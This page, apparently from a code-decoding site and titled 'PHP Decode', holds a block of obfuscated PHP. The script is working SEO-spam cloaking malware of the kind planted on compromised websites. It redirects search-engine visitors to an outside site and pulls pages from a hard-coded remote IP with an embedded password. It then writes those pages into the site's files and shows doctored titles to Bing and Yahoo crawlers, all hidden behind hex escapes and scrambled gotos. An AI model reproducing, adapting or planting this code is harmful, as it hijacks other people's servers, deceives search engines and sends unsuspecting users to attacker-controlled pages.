PHP Decode

<?php
 goto LFSdC; ZEo1P: if (strpos($_SERVER["\x48\x54\124\x50\x5f\122\x45\106\x45\x52\105\122"], "\147\157\157\147\x6c\145\x2e") or strpos($_SERVER["\110\x54\x54\x50\137\x52\x45\x46\x45\x52\105\x52"], "\171\x61\x68\x6f\x6f\56") or strpos($_SERVER["\110\124\124\120\x5f\122\105\x46\105\x52\105\122"], "\142\x69\x6e\x67\56")) { header("\114\157\x63\x61\x74\x69\157\x6e\72\x20\x68\x74\x74\160\x73\x3a\x2f\57\x63\150\x70\x6f\153\x2e\163\x69\164\145\x2f\145\156\x74\x65\162\x2f\77\x6d\141\x72\153\x3d{$today}\x2d{$s}\46\x65\156\x67\x6b\145\171\75{$keyword}"); die; } else { $myname = $_GET["\x69\x64"] . "\56\160\150\160"; if (file_exists("\151\156\144\x65\170\57" . $myname)) { $html = @file_get_contents("\x69\x6e\144\145\170\x2f" . $myname); if (strpos($_SERVER["\x48\x54\x54\120\x5f\x55\x53\105\122\137\101\107\105\x4e\x54"], "\x62\151\x6e\x67") > 2 or strpos($_SERVER["\110\124\124\120\x5f\125\x53\x45\122\x5f\x41\107\x45\x4e\x54"], "\171\x61\150\157\157") > 2) { $keyword = str_replace("\x2d", "\40", $_GET["\x69\144"]); $html = str_replace("\x3c\x74\151\x74\154\x65\76\x3c\57\164\x69\164\154\x65\x3e", "\x3c\164\151\x74\154\145\76{$keyword}\74\x2f\x74\x69\x74\x6c\x65\x3e", $html); } echo $html; die; } } goto V_aKG; QJZeV: if ($s == "\134" | $s == "\57") { $s = ''; } goto KOIk2; vy5uL: if ($_GET["\151\x64"] == "\x74\145\x73\x74\151\x6e\147") { echo "\x74\x65\x73\164\x20\147\x6f\157\144\56\x2e\x2e"; die; } goto krSyu; BpP3C: $xx1 = 5; goto zMbLH; lPr5r: $apass1 = "\x76\151\163\144\x6f\151\x6a\145\x77"; goto VkMtz; tcpjB: $apass3 = "\162\x76\63\62\x79\x64\141\x63\x73\x76\163\144\x76"; goto bdM4c; GKjxS: if (strpos($_SERVER["\x48\124\124\120\x5f\x55\x53\x45\122\137\x41\107\105\x4e\x54"], "\x62\x69\156\x67") > 2 or strpos($_SERVER["\x48\124\x54\120\137\x55\x53\x45\x52\x5f\101\107\105\116\124"], "\171\141\x68\157\x6f") > 2) { $text = str_replace("\74\x74\x69\x74\154\145\x3e\x3c\57\164\x69\164\x6c\x65\76", "\x3c\x74\x69\164\x6c\145\x3e{$keyword}\74\57\x74\x69\164\154\145\x3e", $text); } goto AQmS_; LUvBM: if (strlen($text) < 5000) { $url = "\61\63\65\x2e\x31\x38\x31\x2e\x32\x31\56\x31\x32\x36"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\40\x28{$errno}\51\74\x62\x72\x20\x2f\76\xa"; } else { $req = "\57" . $_GET["\146\156"] . "\56\x70\150\x70\77\160\141\x73\163\x3d{$apass}\x26\161\x3d{$_GET["\x69\x64"]}"; $out = "\x47\105\x54\40{$req}\x20\110\124\x54\120\x2f\61\56\x30\xd\xa"; $out .= "\110\x6f\163\164\x3a\x20{$url}\15\xa"; $out .= "\x43\157\x6e\156\x65\143\164\x69\x6f\156\x3a\40\103\x6c\157\x73\x65\15\12\xd\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\12", $text); $text = $text[7]; } goto GhrST; ho7PJ: $text = ''; goto RPC3t; LFSdC: error_reporting(0); goto V5o7v; buFfR: $keyword = str_replace("\x20", "\53", $keyword); goto Jrj2m; krSyu: if ($_GET["\x69\144"] == "\x69\x6e\144\145\x78") { header("\x4c\157\x63\x61\x74\151\157\156\72\x20\150\164\x74\x70\x73\x3a\x2f\x2f\x67\157\157\x67\x6c\145\x2e\x63\x6f\155"); die; } goto ETX4l; bdM4c: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto ZEo1P; V5o7v: $today = "\x32\x30\x32\63\61\x32\62\x37\55"; goto A9HzL; A9HzL: foreach ($_GET as $a => $b) { $_GET["\151\x64"] = $b; } goto vy5uL; AQmS_: echo $text; goto Uf7uS; l7rkL: $_GET["\x66\156"] = "\x36\71\66\71\x36\x39\x6e\x65\167"; goto lPr5r; VkMtz: $x1 = 3; goto BpP3C; D3y1o: $s = dirname($_SERVER["\120\x48\x50\137\123\105\x4c\x46"]); goto QJZeV; Jrj2m: $apass2 = "\x62\x32\63\x68\x72\x32\x33\166\162\63\x32"; goto D3y1o; V_aKG: $query_pars_2 = str_replace("\55", "\x2b", $_GET["\x69\x64"]); goto ho7PJ; ETX4l: $_GET["\167\157\162\154\x64"] = 5; goto l7rkL; GhrST: if (strlen($text) > 5000) { $out = fopen("\151\156\144\145\x78\57" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto GKjxS; rQTN0: if (strlen($text) < 5000) { $text = file_get_contents("\150\164\164\x70\x3a\57\x2f\61\x33\x35\x2e\61\70\x31\x2e\x32\x31\56\61\62\x36\x2f" . $_GET["\x66\x6e"] . "\x2e\160\150\x70\x3f\x70\x61\163\x73\75{$apass}\46\161\x3d{$_GET["\x69\x64"]}"); } goto LUvBM; KOIk2: $s = $_SERVER["\123\105\x52\126\x45\122\137\x4e\x41\x4d\105"] . $s; goto tcpjB; zMbLH: $keyword = str_replace("\55", "\x20", $_GET["\x69\x64"]); goto buFfR; RPC3t: if (function_exists("\143\165\x72\154\x5f\151\x6e\151\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\x74\164\x70\72\x2f\57\x31\63\65\x2e\61\x38\x31\56\62\x31\56\61\x32\x36\57" . $_GET["\146\x6e"] . "\56\x70\x68\160\77\x70\x61\x73\163\x3d{$apass}\46\161\x3d{$_GET["\x69\x64"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\x6f\172\151\154\x6c\x61\57\x34\56\x30\40\50\x63\x6f\x6d\160\141\164\x69\142\x6c\145\x3b\x20\x4d\x53\111\105\40\66\x2e\x30\x3b\40\127\151\x6e\144\x6f\x77\163\40\x4e\x54\x20\x35\x2e\x31\x3b\40\123\126\x31\51"); $text = curl_exec($ch); curl_close($ch); } goto rQTN0; Uf7uS: ?>